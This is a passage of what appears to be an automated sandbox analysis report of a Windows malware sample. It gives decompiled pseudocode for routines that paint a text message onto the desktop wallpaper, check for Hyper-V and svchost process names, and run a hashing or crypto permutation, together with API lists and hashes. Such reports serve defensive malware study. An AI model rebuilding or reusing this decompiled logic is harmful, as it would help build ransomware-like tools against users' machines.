					SelectObject(_t128, _t68);
					SetBkMode(_t128, 1);
					SetTextColor(_t128, 0xffffff);
					_t73 = GetStockObject(2);
					_v56.left = _v56.left & 0x00000000;
					_v56.top = _v56.top & 0x00000000;
					_v56.right = _t121;
					_v56.bottom = _v8;
					FillRect(_t128,  &_v56, _t73);
					_t104 = _v8;
					_t77 = _t104 * _t121;
					asm("cdq");
					_t114 = _t77 % _v16;
					if(_t77 / _v16 <= 0) {
						L12:
						asm("cdq");
						asm("cdq");
						_v56.top = (_v56.bottom - _t114 >> 1) - (_v8 - _t114 >> 1) - _v36;
						DrawTextW(_t128,  *0x9d2204, 0xffffffff,  &_v56, 0x11);
						_t123 = E009C4439(_t114, _t144);
						if(_t123 != 0) {
							E009C4284(_t114, _v24, _t101, _t123);
							SystemParametersInfoW(0x14, 0, _t123, 3);
							E009C47F8(_t123);
						}
						DeleteObject(_v40);
						goto L15;
					}
					_t91 = 0;
					_v12 = 0;
					if(_t121 <= 0) {
						goto L12;
					}
					_t102 = _t128;
					do {
						_v16 = _v16 & 0x00000000;
						if(_t104 <= 0) {
							goto L10;
						} else {
							goto L8;
						}
						do {
							L8:
							_t92 = E009C544B(_t114, 0, 0xffffffff);
							_t94 = E009C544B(_t92 % 0xc8, 0, 0xffffffff);
							_t111 = 0x1e;
							_t96 = E009C544B(_t94 % _t111, 0, 0xffffffff);
							_t134 = _t134 + 0x18;
							_t132 = _v16;
							_t112 = 0x1e;
							_t114 = _t96 % _t112;
							SetPixel(_t102, _v12, _t132, _t114 & 0x000000ff | (_t94 % _t111 & 0x000000ff | (_t92 % 0x000000c8 & 0x000000ff) << 0x00000008) << 0x00000008);
							_t104 = _v8;
							_t133 = _t132 + 1;
							_v16 = _t133;
						} while (_t133 < _t104);
						_t121 = _v28;
						_t91 = _v12;
						L10:
						_t91 = _t91 + 1;
						_v12 = _t91;
						_t144 = _t91 - _t121;
					} while (_t91 < _t121);
					_t101 = _v32;
					_t128 = _v20;
					goto L12;
				}
				return _t56;
			}






































                                                                                                                                                            0x009c4547
                                                                                                                                                            0x009c454d
                                                                                                                                                            0x009c454f
                                                                                                                                                            0x009c4554
                                                                                                                                                            0x009c4562
                                                                                                                                                            0x009c4564
                                                                                                                                                            0x009c4569
                                                                                                                                                            0x009c473f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c4748
                                                                                                                                                            0x009c4573
                                                                                                                                                            0x009c457b
                                                                                                                                                            0x009c457d
                                                                                                                                                            0x009c4580
                                                                                                                                                            0x009c4583
                                                                                                                                                            0x009c4586
                                                                                                                                                            0x009c458f
                                                                                                                                                            0x009c4592
                                                                                                                                                            0x009c4598
                                                                                                                                                            0x009c459d
                                                                                                                                                            0x009c4737
                                                                                                                                                            0x009c4738
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c473e
                                                                                                                                                            0x009c45a5
                                                                                                                                                            0x009c45c1
                                                                                                                                                            0x009c45d3
                                                                                                                                                            0x009c45d6
                                                                                                                                                            0x009c45dc
                                                                                                                                                            0x009c45e1
                                                                                                                                                            0x009c472e
                                                                                                                                                            0x009c4731
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c4731
                                                                                                                                                            0x009c45e9
                                                                                                                                                            0x009c45f2
                                                                                                                                                            0x009c45fe
                                                                                                                                                            0x009c4606
                                                                                                                                                            0x009c460f
                                                                                                                                                            0x009c4613
                                                                                                                                                            0x009c461b
                                                                                                                                                            0x009c4620
                                                                                                                                                            0x009c4623
                                                                                                                                                            0x009c4629
                                                                                                                                                            0x009c462e
                                                                                                                                                            0x009c4631
                                                                                                                                                            0x009c4632
                                                                                                                                                            0x009c4637
                                                                                                                                                            0x009c46ca
                                                                                                                                                            0x009c46cd
                                                                                                                                                            0x009c46d5
                                                                                                                                                            0x009c46ef
                                                                                                                                                            0x009c46f3
                                                                                                                                                            0x009c46fe
                                                                                                                                                            0x009c4702
                                                                                                                                                            0x009c4709
                                                                                                                                                            0x009c4718
                                                                                                                                                            0x009c471f
                                                                                                                                                            0x009c4724
                                                                                                                                                            0x009c4728
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c4728
                                                                                                                                                            0x009c463d
                                                                                                                                                            0x009c463f
                                                                                                                                                            0x009c4644
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c464a
                                                                                                                                                            0x009c464c
                                                                                                                                                            0x009c464c
                                                                                                                                                            0x009c4652
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c4654
                                                                                                                                                            0x009c4654
                                                                                                                                                            0x009c4658
                                                                                                                                                            0x009c4670
                                                                                                                                                            0x009c4677
                                                                                                                                                            0x009c4688
                                                                                                                                                            0x009c468d
                                                                                                                                                            0x009c4690
                                                                                                                                                            0x009c4697
                                                                                                                                                            0x009c4698
                                                                                                                                                            0x009c46a5
                                                                                                                                                            0x009c46ab
                                                                                                                                                            0x009c46ae
                                                                                                                                                            0x009c46af
                                                                                                                                                            0x009c46b2
                                                                                                                                                            0x009c46b6
                                                                                                                                                            0x009c46b9
                                                                                                                                                            0x009c46bc
                                                                                                                                                            0x009c46bc
                                                                                                                                                            0x009c46bd
                                                                                                                                                            0x009c46c0
                                                                                                                                                            0x009c46c0
                                                                                                                                                            0x009c46c4
                                                                                                                                                            0x009c46c7
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c46c7
                                                                                                                                                            0x009c474d

                                                                                                                                                            APIs
                                                                                                                                                            • GetDC.USER32(00000000), ref: 009C4547
                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 009C455C
                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 009C4573
                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 009C4586
                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,00000000,00000000), ref: 009C4592
                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 009C45A5
                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009C45AE
                                                                                                                                                            • MulDiv.KERNEL32(00000012,00000000,00000048), ref: 009C45B9
                                                                                                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000004,00000000,00000000), ref: 009C45D6
                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 009C45E9
                                                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 009C45F2
                                                                                                                                                            • SetTextColor.GDI32(00000000,00FFFFFF), ref: 009C45FE
                                                                                                                                                            • GetStockObject.GDI32(00000002), ref: 009C4606
                                                                                                                                                            • FillRect.USER32(00000000,00000000,00000000), ref: 009C4623
                                                                                                                                                            • SetPixel.GDI32(00000000,?,00000000,00000000), ref: 009C46A5
                                                                                                                                                            • DrawTextW.USER32(00000000,000000FF,00000000,00000011,?), ref: 009C46F3
                                                                                                                                                            • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 009C4718
                                                                                                                                                            • DeleteObject.GDI32(?), ref: 009C4728
                                                                                                                                                            • DeleteObject.GDI32(?), ref: 009C4731
                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 009C4738
                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 009C4742
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Object$CapsCreateDeleteDevice$CompatibleSelectText$BitmapColorDrawFillFontInfoModeParametersPixelRectReleaseStockSystem
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 830383330-0
                                                                                                                                                            • Opcode ID: 6938585bfe26d5144c72f17f0fe51bf68f5a39e7d6828ab56b43f21bc43d2825
                                                                                                                                                            • Instruction ID: 5e1b8e778e4d2645bee965dac130e16e4364e1f206b100f2a3ee3d4e5142a343
                                                                                                                                                            • Opcode Fuzzy Hash: 6938585bfe26d5144c72f17f0fe51bf68f5a39e7d6828ab56b43f21bc43d2825
                                                                                                                                                            • Instruction Fuzzy Hash: C651F3B2E55215BFEB049FA4DC49FAE7BB9EF89311F10021AFA11E62D0DB704D409B61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C4964, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 73COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 36%
                                                                                                                                                            			E009C4964(long _a4) {
				char _v8;
				WCHAR* _t4;
				void* _t6;
				signed int _t15;
				void* _t31;

				_t4 =  *0x9d1d7c; // 0x0
				_v8 = 0x800;
				_push(0x800);
				if(_t4 != 0) {
					_push(0);
					_push(_t4);
					E009C4832();
				} else {
					 *0x9d1d7c = E009C47AB();
				}
				_t6 = OpenProcess(0x1000, 0, _a4);
				_t31 = _t6;
				if(_t31 != 0) {
					 *0x9d1010(_t31, 0,  *0x9d1d7c,  &_v8);
					E009C4B21(_t31);
					_t33 = PathFindFileNameW( *0x9d1d7c);
					if(E009C6146(_t10, L"vmcompute.exe") != 0) {
						if(E009C6146(_t33, L"vmms.exe") == 0 || E009C6146(_t33, L"vmwp.exe") == 0) {
							goto L5;
						} else {
							_t15 = E009C6146(_t33, L"svchost.exe");
							asm("sbb eax, eax");
							_t6 =  ~_t15 + 1;
						}
					} else {
						L5:
						_t6 = 1;
					}
				}
				return _t6;
			}








                                                                                                                                                            0x009c4968
                                                                                                                                                            0x009c4972
                                                                                                                                                            0x009c4975
                                                                                                                                                            0x009c4978
                                                                                                                                                            0x009c4987
                                                                                                                                                            0x009c4989
                                                                                                                                                            0x009c498a
                                                                                                                                                            0x009c497a
                                                                                                                                                            0x009c4980
                                                                                                                                                            0x009c4980
                                                                                                                                                            0x009c499d
                                                                                                                                                            0x009c49a3
                                                                                                                                                            0x009c49a7
                                                                                                                                                            0x009c49b6
                                                                                                                                                            0x009c49bd
                                                                                                                                                            0x009c49cf
                                                                                                                                                            0x009c49e0
                                                                                                                                                            0x009c49f6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c4a09
                                                                                                                                                            0x009c4a0f
                                                                                                                                                            0x009c4a17
                                                                                                                                                            0x009c4a1a
                                                                                                                                                            0x009c4a1a
                                                                                                                                                            0x009c49e2
                                                                                                                                                            0x009c49e2
                                                                                                                                                            0x009c49e4
                                                                                                                                                            0x009c49e4
                                                                                                                                                            0x009c49e0
                                                                                                                                                            0x009c4a1f

                                                                                                                                                            APIs
                                                                                                                                                            • OpenProcess.KERNEL32(00001000,00000000,009C5B66,?,?,009C5B66,?), ref: 009C499D
                                                                                                                                                            • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,?,009C5B66,?), ref: 009C49B6
                                                                                                                                                            • PathFindFileNameW.SHLWAPI(?,009C5B66,?), ref: 009C49C9
                                                                                                                                                              • Part of subcall function 009C47AB: HeapCreate.KERNEL32(00000000,00400000,00000000,?,009C1C60,?,?,009C150C), ref: 009C47C0
                                                                                                                                                              • Part of subcall function 009C47AB: GetProcessHeap.KERNEL32(?,009C1C60,?,?,009C150C), ref: 009C47CF
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Process$HeapName$CreateFileFindFullImageOpenPathQuery
                                                                                                                                                            • String ID: svchost.exe$vmcompute.exe$vmms.exe$vmwp.exe
                                                                                                                                                            • API String ID: 2112901129-1116827676
                                                                                                                                                            • Opcode ID: 3539a0b2a83a68cf96a7eebd5cae86d5de6599ef4bed53a2109a076a4e04d927
                                                                                                                                                            • Instruction ID: c38d92889dfe1a9071561c205938ebe47d1cb3846aa5b2b29fd9756bd483ffa9
                                                                                                                                                            • Opcode Fuzzy Hash: 3539a0b2a83a68cf96a7eebd5cae86d5de6599ef4bed53a2109a076a4e04d927
                                                                                                                                                            • Instruction Fuzzy Hash: 4911233BE9E6127FE6186770BC12F6A376C8B46764F24402FF901D11C1EB20894096AB
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009CAB95, Relevance: 1.0, Instructions: 995COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009CAB95(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int* _v44;
				signed int _t706;
				signed int _t722;
				signed int _t736;
				signed int _t768;
				signed int* _t836;
				signed int* _t863;
				signed int* _t890;
				signed int* _t917;
				signed int* _t944;
				signed int _t969;
				signed int* _t985;
				unsigned int _t986;
				signed int _t988;
				signed int* _t989;
				signed int _t990;
				signed int _t991;
				signed int _t993;
				signed int _t995;
				signed int _t997;
				signed int _t999;
				signed int _t1001;
				signed int _t1003;
				signed int _t1005;
				signed int _t1007;
				signed int _t1009;
				signed int _t1011;
				signed int _t1013;
				signed int* _t1016;
				signed int* _t1018;
				signed int* _t1020;
				signed int* _t1022;
				signed int* _t1024;
				signed int _t1034;
				signed int* _t1050;
				unsigned int _t1051;
				signed int* _t1066;
				signed int _t1067;
				signed int* _t1084;
				signed int* _t1099;
				unsigned int _t1100;
				signed int* _t1116;
				signed int _t1189;
				signed int _t1211;
				signed int _t1233;
				signed int _t1255;
				signed int _t1277;
				signed int* _t1299;
				signed int* _t1300;
				signed int _t1312;
				signed int _t1316;
				signed int _t1319;
				signed int _t1323;
				signed int _t1327;
				signed int _t1330;
				signed int _t1332;
				signed int* _t1334;
				signed int _t1335;
				signed int* _t1337;
				signed int _t1338;
				signed int* _t1340;
				signed int _t1341;
				signed int* _t1343;
				signed int _t1344;
				signed int* _t1346;
				signed int _t1347;
				signed int* _t1349;
				signed int _t1350;
				signed int* _t1352;
				signed int _t1353;
				signed int* _t1355;
				unsigned int _t1356;
				signed int* _t1358;
				unsigned int _t1359;
				signed int _t1361;
				signed int* _t1363;
				unsigned int _t1364;
				signed int _t1366;
				signed int* _t1367;
				signed int _t1368;
				signed int* _t1369;
				signed int _t1370;
				signed int* _t1371;
				signed int _t1372;
				signed int* _t1373;
				signed int _t1374;
				signed int* _t1375;
				signed int _t1380;
				signed int* _t1382;
				unsigned int _t1383;
				signed int _t1385;
				signed int _t1387;
				signed int _t1389;
				signed int _t1391;
				signed int _t1393;
				signed int _t1395;
				signed int _t1397;
				signed int _t1399;
				signed int _t1401;
				signed int* _t1403;
				signed int _t1404;
				intOrPtr* _t1406;
				signed int _t1407;
				signed int* _t1408;
				signed int _t1409;
				signed int* _t1410;
				signed int _t1411;
				signed int* _t1412;
				signed int _t1413;
				signed int* _t1414;
				signed int _t1415;
				signed int* _t1416;
				signed int _t1419;
				signed int _t1424;
				signed int _t1428;
				signed int _t1433;
				signed int _t1438;
				signed int _t1441;
				signed int* _t1443;
				signed int _t1444;
				signed int* _t1446;
				signed int _t1447;
				signed int* _t1449;
				signed int _t1450;
				signed int* _t1452;
				signed int _t1453;
				signed int* _t1455;
				signed int _t1456;
				signed int* _t1458;
				signed int _t1459;
				signed int* _t1461;
				signed int _t1462;
				signed int* _t1464;
				signed int _t1465;
				signed int* _t1467;
				signed int _t1468;
				signed int _t1470;
				signed int _t1472;
				signed int _t1474;
				signed int _t1475;
				signed int _t1476;
				signed int _t1477;
				signed int _t1478;

				_t1416 = _a4;
				_v44 = 0x9cfb38;
				do {
					_t3 =  &(_t1416[4]); // 0xff348d8d
					_t4 =  &(_t1416[0xe]); // 0x1174ff85
					_t5 =  &(_t1416[0x18]); // 0x5fffc883
					_t6 =  &(_t1416[0x22]); // 0x88
					_t7 =  &(_t1416[0x2c]); // 0xa48e
					_t8 =  &(_t1416[0xa]); // 0x3e
					_t9 =  &(_t1416[0x14]); // 0xffff34bd
					_t10 =  &(_t1416[0x1e]); // 0x9cfb38d8
					_t11 =  &(_t1416[0x28]); // 0x8b000000
					_t12 =  &(_t1416[1]); // 0x3b590845
					_t13 =  &(_t1416[0xb]); // 0x308458b
					_t14 =  &(_t1416[0x15]); // 0xc8b9ff
					_t15 =  &(_t1416[0x1f]); // 0x105e8b00
					_t16 =  &(_t1416[0x29]); // 0x4e33044e
					_t17 =  &(_t1416[5]); // 0x5051ffff
					_t18 =  &(_t1416[0xf]); // 0x34958d57
					_t19 =  &(_t1416[0x19]); // 0xe58b5b5e
					_t20 =  &(_t1416[0x23]); // 0xb09e33
					_t21 =  &(_t1416[0x2d]); // 0x14568b00
					_t22 =  &(_t1416[8]); // 0xff34858d
					_t23 =  &(_t1416[0x12]); // 0xc483ffff
					_t24 =  &(_t1416[0x1c]); // 0x758b5653
					_t25 =  &(_t1416[0x26]); // 0x46335046
					_t26 =  &(_t1416[0x30]); // 0x8c
					_t1380 =  *_t22 ^  *_t23 ^  *_t24 ^  *_t25 ^  *_t26;
					_v12 =  *_t3 ^  *_t4 ^  *_t5 ^  *_t6 ^  *_t7;
					_t28 =  &(_t1416[6]); // 0xff9cc5e8
					_t29 =  &(_t1416[0x10]); // 0x52ffffff
					_t30 =  &(_t1416[0x1a]); // 0x8b55c35d
					_t31 =  &(_t1416[0x24]); // 0x68b0000
					_t32 =  &(_t1416[0x2e]); // 0x333c5633
					_v20 =  *_t1416 ^  *_t8 ^  *_t9 ^  *_t10 ^  *_t11;
					_t34 =  &(_t1416[2]); // 0x852d72fe
					_t35 =  &(_t1416[0xc]); // 0x89fe2bc6
					_t36 =  &(_t1416[0x16]); // 0xaaf30000
					_t37 =  &(_t1416[0x20]); // 0x33385e33
					_t38 =  &(_t1416[0x2a]); // 0x544e332c
					_t706 =  *_t34 ^  *_t35 ^  *_t36 ^  *_t37 ^  *_t38;
					_v16 =  *_t12 ^  *_t13 ^  *_t14 ^  *_t15 ^  *_t16;
					_t40 =  &(_t1416[3]); // 0x561174f6
					_t41 =  &(_t1416[0xd]); // 0xceeb0845
					_t42 =  &(_t1416[0x17]); // 0x3ebc033
					_t43 =  &(_t1416[0x21]); // 0x9e33605e
					_t44 =  &(_t1416[0x2b]); // 0x337c4e33
					_t1034 =  *_t40 ^  *_t41 ^  *_t42 ^  *_t43 ^  *_t44;
					_v40 =  *_t17 ^  *_t18 ^  *_t19 ^  *_t20 ^  *_t21;
					_t46 =  &(_t1416[7]); // 0xcc483ff
					_t47 =  &(_t1416[0x11]); // 0x9c98e850
					_t48 =  &(_t1416[0x1b]); // 0x28ec83ec
					_t49 =  &(_t1416[0x25]); // 0x33284633
					_t50 =  &(_t1416[0x2f]); // 0x96336456
					_v32 =  *_t28 ^  *_t29 ^  *_t30 ^  *_t31 ^  *_t32;
					_t52 =  &(_t1416[9]); // 0xe850ffff
					_t53 =  &(_t1416[0x13]); // 0x8dc0320c
					_t54 =  &(_t1416[0x1d]); // 0x45c75708
					_t55 =  &(_t1416[0x27]); // 0xa0863378
					_t56 =  &(_t1416[0x31]); // 0xb49633
					_v24 = _t706;
					_v28 = _t1034;
					_v36 =  *_t46 ^  *_t47 ^  *_t48 ^  *_t49 ^  *_t50;
					_t1419 = _t1034 >> 0x0000001f | _t706 + _t706;
					_v8 =  *_t52 ^  *_t53 ^  *_t54 ^  *_t55 ^  *_t56;
					_t985 = _a4;
					_t1312 = (_t1034 << 0x00000020 | _t706) << 1;
					_t67 =  &(_t985[1]); // 0x3b590845
					 *_t985 = _t1419 ^  *_a4 ^ _t1380;
					_t985[1] = _t1312 ^  *_t67 ^ _v8;
					_t985[0xa] = _t985[0xa] ^ _t1419 ^ _t1380;
					_t985[0xb] = _t985[0xb] ^ _t1312 ^ _v8;
					_t75 =  &(_t985[0x14]); // 0xffff34bd
					_t76 =  &(_t985[0x15]); // 0xc8b9ff
					_t985[0x14] = _t1419 ^  *_t75 ^ _t1380;
					_t985[0x15] = _t1312 ^  *_t76 ^ _v8;
					_t80 =  &(_t985[0x1e]); // 0x9cfb38d8
					_t81 =  &(_t985[0x1f]); // 0x105e8b00
					_t985[0x1e] = _t1419 ^  *_t80 ^ _t1380;
					_t1050 = _t985;
					_t1050[0x1f] = _t1312 ^  *_t81 ^ _v8;
					_t85 =  &(_t1050[0x28]); // 0x8b000000
					_t86 =  &(_t1050[0x29]); // 0x4e33044e
					_t1050[0x28] = _t1419 ^  *_t85 ^ _t1380;
					_t1050[0x29] = _t1312 ^  *_t86 ^ _v8;
					_t1051 = _v40;
					_t722 = _v12;
					_t1316 = (_t1051 << 0x00000020 | _t722) << 1;
					_t1424 = _t1051 >> 0x0000001f | _t722 + _t722;
					_t96 =  &(_t985[2]); // 0x852d72fe
					_t97 =  &(_t985[3]); // 0x561174f6
					_t985[2] = _t1424 ^  *_t96 ^ _v20;
					_t985[3] = _t1316 ^  *_t97 ^ _v16;
					_t102 =  &(_t985[0xc]); // 0x89fe2bc6
					_t103 =  &(_t985[0xd]); // 0xceeb0845
					_t985[0xc] = _t1424 ^  *_t102 ^ _v20;
					_t985[0xd] = _t1316 ^  *_t103 ^ _v16;
					_t985[0x16] = _t985[0x16] ^ _t1424 ^ _v20;
					_t985[0x17] = _t985[0x17] ^ _t1316 ^ _v16;
					_t985[0x20] = _t985[0x20] ^ _t1424 ^ _v20;
					_t1066 = _t985;
					_t1066[0x21] = _t1066[0x21] ^ _t1316 ^ _v16;
					_t1066[0x2a] = _t1066[0x2a] ^ _t1424 ^ _v20;
					_t1066[0x2b] = _t1066[0x2b] ^ _t1316 ^ _v16;
					_t1067 = _v36;
					_t736 = _v32;
					_t1428 = _t1067 >> 0x0000001f | _t736 + _t736;
					_t1319 = (_t1067 << 0x00000020 | _t736) << 1;
					_t132 =  &(_t985[4]); // 0xff348d8d
					_t133 =  &(_t985[5]); // 0x5051ffff
					_t985[4] = _t1428 ^  *_t132 ^ _v24;
					_t985[5] = _t1319 ^  *_t133 ^ _v28;
					_t138 =  &(_t985[0xe]); // 0x1174ff85
					_t139 =  &(_t985[0xf]); // 0x34958d57
					_t985[0xe] = _t1428 ^  *_t138 ^ _v24;
					_t985[0xf] = _t1319 ^  *_t139 ^ _v28;
					_t144 =  &(_t985[0x18]); // 0x5fffc883
					_t145 =  &(_t985[0x19]); // 0xe58b5b5e
					_t985[0x18] = _t1428 ^  *_t144 ^ _v24;
					_t985[0x19] = _t1319 ^  *_t145 ^ _v28;
					_t150 =  &(_t985[0x22]); // 0x88
					_t151 =  &(_t985[0x23]); // 0xb09e33
					_t985[0x22] = _t1428 ^  *_t150 ^ _v24;
					_t1084 = _t985;
					_t986 = _v8;
					_t1084[0x23] = _t1319 ^  *_t151 ^ _v28;
					_t157 =  &(_t1084[0x2c]); // 0xa48e
					_t158 =  &(_t1084[0x2d]); // 0x14568b00
					_t1084[0x2c] = _t1428 ^  *_t157 ^ _v24;
					_t1084[0x2d] = _t1319 ^  *_t158 ^ _v28;
					_t1323 = (_t986 << 0x00000020 | _t1380) << 1;
					_t988 = _v40;
					_t1433 = _t986 >> 0x0000001f | _t1380 + _t1380;
					_t1382 = _a4;
					 *(_t1382 + 0x18) =  *(_t1382 + 0x18) ^ _t1433 ^ _v12;
					 *(_t1382 + 0x1c) =  *(_t1382 + 0x1c) ^ _t1323 ^ _t988;
					_t174 = _t1382 + 0x40; // 0x52ffffff
					_t176 = _t1382 + 0x44; // 0x9c98e850
					 *(_t1382 + 0x40) = _t1433 ^  *_t174 ^ _v12;
					 *(_t1382 + 0x44) = _t1323 ^  *_t176 ^ _t988;
					_t179 = _t1382 + 0x68; // 0x8b55c35d
					_t180 = _t1382 + 0x6c; // 0x28ec83ec
					 *(_t1382 + 0x68) = _t1433 ^  *_t179 ^ _v12;
					 *(_t1382 + 0x6c) = _t1323 ^  *_t180 ^ _t988;
					_t184 = _t1382 + 0x90; // 0x68b0000
					_t185 = _t1382 + 0x94; // 0x33284633
					 *(_t1382 + 0x90) = _t1433 ^  *_t184 ^ _v12;
					_t1099 = _t1382;
					 *(_t1099 + 0x94) = _t1323 ^  *_t185 ^ _t988;
					_t189 = _t1099 + 0xb8; // 0x333c5633
					_t190 = _t1099 + 0xbc; // 0x96336456
					 *(_t1099 + 0xb8) = _t1433 ^  *_t189 ^ _v12;
					_t989 = _t1382;
					 *(_t1099 + 0xbc) = _t1323 ^  *_t190 ^ _t988;
					_t1100 = _v16;
					_t768 = _v20;
					_t1327 = (_t1100 << 0x00000020 | _t768) << 1;
					_t1438 = _t1100 >> 0x0000001f | _t768 + _t768;
					_t200 = _t989 + 0x24; // 0xe850ffff
					_t201 = _t989 + 0x20; // 0xff34858d
					 *(_t989 + 0x20) = _t1438 ^  *_t201 ^ _v32;
					_t990 = _v36;
					 *(_t989 + 0x24) = _t1327 ^  *_t200 ^ _v36;
					 *(_t1382 + 0x48) =  *(_t1382 + 0x48) ^ _t1438 ^ _v32;
					 *(_t1382 + 0x4c) =  *(_t1382 + 0x4c) ^ _t1327 ^ _t990;
					_t212 = _t1382 + 0x70; // 0x758b5653
					_t213 = _t1382 + 0x74; // 0x45c75708
					 *(_t1382 + 0x70) = _t1438 ^  *_t212 ^ _v32;
					 *(_t1382 + 0x74) = _t1327 ^  *_t213 ^ _t990;
					_t217 = _t1382 + 0x98; // 0x46335046
					_t219 = _t1382 + 0x9c; // 0xa0863378
					 *(_t1382 + 0x98) = _t1438 ^  *_t217 ^ _v32;
					_t1116 = _t1382;
					 *(_t1116 + 0x9c) = _t1327 ^  *_t219 ^ _t990;
					_t222 = _t1116 + 0xc0; // 0x8c
					_t223 = _t1116 + 0xc4; // 0xb49633
					 *(_t1116 + 0xc0) = _t1438 ^  *_t222 ^ _v32;
					 *(_t1116 + 0xc4) = _t1327 ^  *_t223 ^ _t990;
					_t227 = _t1116 + 8; // 0x852d72fe
					_t1441 =  *_t227;
					_t228 = _t1116 + 0xc; // 0x561174f6
					_t1330 =  *_t228;
					_t229 = _t1116 + 0x50; // 0xffff34bd
					_t991 =  *_t229;
					_t230 = _t1116 + 0x54; // 0xc8b9ff
					_t1383 =  *_t230;
					_t1443 = _a4;
					 *(_t1443 + 0x50) = _t1330 >> 0x0000001f | _t1441 + _t1441;
					 *(_t1443 + 0x54) = (_t1330 << 0x00000020 | _t1441) << 1;
					_t238 = _t1443 + 0x38; // 0x1174ff85
					_t239 = _t1443 + 0x3c; // 0x34958d57
					_t1332 =  *_t239;
					_v40 =  *_t238;
					 *(_t1443 + 0x3c) = (_t1383 << 0x00000020 | _t991) << 3;
					 *(_t1443 + 0x38) = _t1383 >> 0x0000001d | _t991 << 0x00000003;
					_t247 = _t1443 + 0x58; // 0xaaf30000
					_t1385 =  *_t247;
					_t248 = _t1443 + 0x5c; // 0x3ebc033
					_t1444 =  *_t248;
					_t993 = _v40;
					_t1334 = _a4;
					 *(_t1334 + 0x58) = _t1332 >> 0x0000001a | _t993 << 0x00000006;
					 *(_t1334 + 0x5c) = (_t1332 << 0x00000020 | _t993) << 6;
					_t257 = _t1334 + 0x88; // 0x88
					_t995 =  *_t257;
					_t258 = _t1334 + 0x8c; // 0xb09e33
					_t1335 =  *_t258;
					_t1446 = _a4;
					 *(_t1446 + 0x88) = _t1444 >> 0x00000016 | _t1385 << 0x0000000a;
					 *(_t1446 + 0x8c) = (_t1444 << 0x00000020 | _t1385) << 0xa;
					_t266 = _t1446 + 0x90; // 0x68b0000
					_t1387 =  *_t266;
					_t267 = _t1446 + 0x94; // 0x33284633
					_t1447 =  *_t267;
					_t1337 = _a4;
					 *(_t1337 + 0x90) = _t1335 >> 0x00000011 | _t995 << 0x0000000f;
					 *(_t1337 + 0x94) = (_t1335 << 0x00000020 | _t995) << 0xf;
					_t275 = _t1337 + 0x18; // 0xff9cc5e8
					_t997 =  *_t275;
					_t276 = _t1337 + 0x1c; // 0xcc483ff
					_t1338 =  *_t276;
					_t1449 = _a4;
					 *(_t1449 + 0x18) = _t1447 >> 0x0000000b | _t1387 << 0x00000015;
					 *(_t1449 + 0x1c) = (_t1447 << 0x00000020 | _t1387) << 0x15;
					_t284 = _t1449 + 0x28; // 0x3e
					_t1389 =  *_t284;
					_t285 = _t1449 + 0x2c; // 0x308458b
